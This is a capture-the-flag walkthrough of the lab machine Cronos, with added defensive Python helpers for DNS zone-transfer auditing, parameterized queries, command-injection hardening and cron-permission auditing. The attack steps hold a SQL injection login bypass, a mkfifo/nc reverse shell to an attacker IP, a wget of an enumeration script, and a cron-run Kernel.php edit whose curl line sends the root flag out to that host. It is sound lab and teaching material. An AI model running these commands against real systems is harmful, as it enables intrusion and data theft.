Basic information

Port scan

22,53,80:

$ nmap -sC -sV 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-24 14:15 CST
Nmap scan report for 10.10.10.13
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds

DNS zone transfer

The DNS service on port 53 allows zone transfers (AXFR) to anyone; the starting domain name has to be guessed, and cronos.htb works:

$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6 <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 69 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Thu Dec 24 14:21:15 CST 2020
;; XFR size: 7 records (messages 1, bytes 203)

Then add the discovered names to the hosts file:

10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb
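As an added audit helper (not part of the original writeup), the following Python parses the text output of dig axfr, reports whether the server actually handed the zone over, lists the hostnames it exposed, and builds the hosts line used above from them. The sample AXFR text embedded in the script is constructed from the records shown in this writeup; the fix on the BIND side is to restrict transfers with allow-transfer { none; }; (or to the secondaries' addresses only).

```python
"""Audit helper for DNS zone-transfer exposure (added example)."""

# Constructed sample: the AXFR response shown above, trimmed to its record lines.
SAMPLE_AXFR = """\
; <<>> DiG 9.10.6 <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 69 msec
;; XFR size: 7 records (messages 1, bytes 203)
"""


def parse_axfr(text):
    """Return resource records as (name, ttl, type, rdata) tuples.

    Comment lines (starting with ';') and blank lines are skipped; the
    trailing dot dig prints on names is stripped so the names can go
    straight into /etc/hosts.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split()
        # A record line is: NAME TTL CLASS TYPE RDATA...
        if len(parts) < 5 or parts[2] != "IN":
            continue
        name, ttl, rtype = parts[0].rstrip("."), int(parts[1]), parts[3]
        records.append((name, ttl, rtype, " ".join(parts[4:])))
    return records


def transfer_succeeded(records):
    """A complete AXFR begins and ends with the zone's SOA record."""
    return len(records) >= 2 and records[0][2] == "SOA" and records[-1][2] == "SOA"


def exposed_hosts(records):
    """Map each A record's name to its address, preserving zone order."""
    hosts = {}
    for name, _ttl, rtype, rdata in records:
        if rtype == "A":
            hosts.setdefault(name, rdata)
    return hosts


def hosts_lines(hosts):
    """Group names by address into /etc/hosts-style lines."""
    by_addr = {}
    for name, addr in hosts.items():
        by_addr.setdefault(addr, []).append(name)
    return [f"{addr} {' '.join(names)}" for addr, names in by_addr.items()]


def audit(text):
    """One-shot audit: did the transfer succeed, and which names leaked?"""
    records = parse_axfr(text)
    return {
        "transferred": transfer_succeeded(records),
        "record_count": len(records),
        "hosts": exposed_hosts(records),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_AXFR)
    print("zone transferred:", result["transferred"], "records:", result["record_count"])
    for line in hosts_lines(result["hosts"]):
        print(line)
```

A refused transfer prints only comment lines (for example "; Transfer failed."), so the parser yields no records and the audit reports transferred as False; run the script against your own name servers from an address that is not a secondary to confirm they refuse.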

admin.cronos.htb

This should be the admin backend, and it requires a login:

SQL injection

Basic SQL injection: admin' or '1'='1 gets you straight in:
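To show why that input passes the login check, here is an added example (not the target's code) with an in-memory SQLite table and constructed credentials: the first function splices the username into the query text, so the quote in the input closes the string literal and the or '1'='1 clause makes the WHERE condition true; the second binds the values as parameters, so the same input is compared as a literal username and fails.

```python
"""Login query: string concatenation vs. parameter binding (added example)."""
import sqlite3


def make_db():
    """Constructed user table with one account; not the target's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """User input is spliced into the SQL text, so quotes in it change the query's logic.

    With username admin' or '1'='1 the statement becomes
      ... WHERE username='admin' or '1'='1' AND password='...'
    and AND binds tighter than OR, so username='admin' alone satisfies it.
    """
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Placeholders send values separately from the SQL text; quotes stay data."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable   :", login_vulnerable(conn, payload, "wrong"))
    print("parameterized:", login_parameterized(conn, payload, "wrong"))
```

Parameter binding is the fix regardless of framework; in Laravel the query builder and Eloquent bind parameters by default, and only raw queries that interpolate strings reintroduce this problem.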

Command injection

This feature is obviously basic command injection as soon as you look at it:
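The writeup does not show the feature's code, so the following is an added illustration (not the target's code) of the pattern behind such a feature: a user-supplied value is pasted into a command string and handed to /bin/sh, which honours separators such as ;. The hardened version validates the argument against an allowlist and runs the program with an argv list, so no shell ever sees the value. /bin/echo stands in for whatever command the feature actually wraps, and the injected input is constructed.

```python
"""Command with a user-supplied argument: unsafe vs. hardened (added example)."""
import re
import subprocess

# Constructed input: a plausible value followed by a shell separator and a second command.
INJECTED = "8.8.8.8; echo INJECTED"

# Allow only the characters the feature genuinely needs (here: an IPv4 address or hostname).
ARG_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def run_vulnerable(arg):
    """One string handed to /bin/sh: ';', '|', '&&' and '$( )' in arg all take effect."""
    out = subprocess.run(f"echo {arg}", shell=True, capture_output=True, text=True)
    return out.stdout


def run_argv_only(arg):
    """argv-list execution: the whole value is one argument, no shell parses it."""
    out = subprocess.run(["echo", arg], capture_output=True, text=True)
    return out.stdout


def run_hardened(arg):
    """Allowlist validation first, then argv-list execution (defence in depth)."""
    if not ARG_RE.match(arg):
        raise ValueError("argument contains characters outside the allowlist")
    return run_argv_only(arg)


def is_rejected(arg):
    """True when the hardened path refuses the argument before running anything."""
    try:
        run_hardened(arg)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable :", repr(run_vulnerable(INJECTED)))
    print("argv only  :", repr(run_argv_only(INJECTED)))
    print("hardened   :", "rejected" if is_rejected(INJECTED) else run_hardened(INJECTED))
```

Validation alone is brittle (an allowlist that later grows to admit spaces or quotes reopens the hole), and argv-list execution alone still lets an attacker pass unexpected options to the wrapped program, which is why both are applied.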

reverse shell

The server has nc but without the -e option, so this approach works:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4445 >/tmp/f

python -c 'import pty; pty.spawn("/bin/bash")'

user flag

Then switch the current shell to the user's home directory and read user.txt:

Privilege escalation enumeration

Run an enumeration script straight away to gather information:

wget http://10.10.14.12:7777/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

It is easy to spot a cron job running as root that executes the schedule function in /var/www/laravel/app/Console/Kernel.php every minute, and that file is writable by our user; according to the Laravel documentation, the code in it can be changed to run arbitrary commands:

Kernel.php

<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

Privilege escalation & root flag

Overwrite the file directly with a custom command and read root.txt:

// $schedule->exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4446 >/tmp/f')->everyMinute();
$schedule->exec("curl http://10.10.14.12:7777/`cat /root/root.txt`")->everyMinute();

rm Kernel.php
wget http://10.10.14.12:7777/Kernel.php
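The root cause here is a root cron job whose effective code lives in a file the web user can write. As an added example (not from the writeup), the following Python audits system-crontab lines for that condition: for every job run as root it takes each absolute path in the command and checks the whole directory tree around it for group- or other-writable entries, since a script run through an interpreter (php, python, sh) is only as trusted as every file it loads. The crontab line is constructed in the standard form the Laravel documentation uses to drive the scheduler (php artisan schedule:run), the app path is a placeholder in a throwaway directory, and the fixture deliberately leaves app/Console/Kernel.php writable to mirror the situation described above.

```python
"""Audit root cron jobs for targets a lower-privileged user can modify (added example)."""
import os
import re
import stat
import tempfile

# Constructed /etc/crontab content; {app} is filled with a throwaway directory, not a real path.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root php {app}/artisan schedule:run >/dev/null 2>&1
"""

# Five time fields, then the user, then the command (system crontab format).
CRON_RE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_system_crontab(text):
    """Return (user, command) for each job line; skips comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def paths_in_command(cmd):
    """Absolute paths mentioned in a command string (redirect to /dev/null ignored)."""
    return [p for p in re.findall(r"/[\w./-]+", cmd) if p != "/dev/null"]


def loosely_writable(path):
    """True when group or other has the write bit; uses mode bits, not os.access (which is always true for root)."""
    mode = os.lstat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def writable_under(root):
    """Every file or directory under root (inclusive) with a group/other write bit."""
    found = [root] if loosely_writable(root) else []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if loosely_writable(full):
                found.append(full)
    return found


def audit_cron(text, only_user="root"):
    """Map each job command run as only_user to the loosely writable paths in its target trees."""
    findings = {}
    for user, cmd in parse_system_crontab(text):
        if user != only_user:
            continue
        hits = []
        for path in paths_in_command(cmd):
            if not os.path.exists(path):
                continue
            tree_root = path if os.path.isdir(path) else os.path.dirname(path)
            hits.extend(writable_under(tree_root))
        findings[cmd] = sorted(set(hits))
    return findings


def build_fixture(base):
    """Constructed app tree: artisan is 0755, app/Console/Kernel.php is left 0666."""
    app = os.path.join(base, "laravel")
    os.makedirs(os.path.join(app, "app", "Console"), mode=0o755)
    artisan = os.path.join(app, "artisan")
    kernel = os.path.join(app, "app", "Console", "Kernel.php")
    for path, mode in ((artisan, 0o755), (kernel, 0o666)):
        with open(path, "w") as fh:
            fh.write("<?php\n")
        os.chmod(path, mode)
    return app, kernel


def demo():
    """Build the fixture, run the audit, and return (findings, path of the writable Kernel.php)."""
    with tempfile.TemporaryDirectory() as base:
        app, kernel = build_fixture(base)
        return audit_cron(SAMPLE_CRONTAB.format(app=app)), kernel


if __name__ == "__main__":
    findings, _ = demo()
    for cmd, hits in findings.items():
        print(cmd)
        for hit in hits:
            print("  writable by non-root:", hit)
```

On a real host, run the audit over /etc/crontab and the files in /etc/cron.d and extend loosely_writable to also flag files owned by the service account the web server runs as (a 0644 file owned by www-data is just as replaceable as a 0666 one); the remediation is root-owned, 0644 application code with the web user granted write access only to storage and cache directories.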

References